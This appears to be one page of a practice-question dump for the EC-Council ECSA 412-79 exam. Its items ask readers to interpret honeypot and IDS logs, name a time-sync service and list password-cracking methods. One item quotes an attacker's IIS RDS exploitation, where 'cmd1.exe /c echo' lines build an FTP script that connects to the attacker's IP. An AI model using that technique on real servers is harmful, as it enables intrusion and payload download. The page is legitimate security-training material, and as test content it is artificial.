PrepAway - Latest Free Exam Questions & Answers

Category: 412-79 (v.1)

Exam 412-79: EC-Council Certified Security Analyst (ECSA) (update September 4th, 2014)

which among the following would be appropriate?

Leave a comment

Study the log given below and answer the following question: Apr 24 14:46:46 [4663]:
spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan:
194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-query:
212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval:
194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN
DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query:
63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query:
63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query:
212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard:
198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer:
38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]: IDS181/nops-x86:
63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session
opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session
opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe:
24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect:
172.16.1.107:23 -> 213.28.22.189:4558 Precautionary measures to prevent this attack would
include writing firewall rules. Of these firewall rules,

which among the following would be appropriate?

What is the name of the service used to synchronize time among multiple computers?

Leave a comment

When monitoring for both intrusion and security events between multiple computers, it is essential
that the computers clocks are synchronize D. Synchronized time allows an administrator to
reconstruct what took place during an attack against multiple computers. Without synchronized
time, it is very difficult to determine exactly when specific events took place, and how events
interlace. What is the name of the service used to synchronize time among multiple computers?

From the options given below choose the one which best interprets the following entry…

4 comments

The following excerpt is taken from a honeypot log. The log captures activities across three days.
There are several intrusion attempts; however, a few are successful. (Note: The objective of this
question is to test whether the student can read basic information from log entries and interpret the
nature of attack.) Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24
18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24
19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25
08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07
[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07
[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17
[5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]:
IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]:
IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]:
IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7
PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7
PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34
[6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]:
IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 From the options given
below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]:
IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

“cmd1.exe /c open 213.116.251.162 >ftpcom” “cmd1.exe /c echo johna2k >>ftpcom” “cmd1.exe /c

Leave a comment

The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort
reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization
vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally
have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in
displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability
allows a malicious user to construct SQL statements that will execute shell commands (such as
CMD. EXE) on the IIS server. He does a quick query to discover that the directory exists, and a
query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which
results in the commands run as shown below.
“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo
haxedj00 >>ftpcom”
“cmd1.exe /c echo get n

What are two common methods used by password cracking software that you can use to obtain the password?

Leave a comment

You are called in to assist the police in an investigation involving a suspected drug dealer. The
suspects house was searched by the police after a warrant was obtained and they located a floppy
disk in the suspects bedroom. The disk contains several files, but they appear to be password
protecteD. What are two common methods used by password cracking software that you can use
to obtain the password?


Page 13 of 22« First...1112131415...20...Last »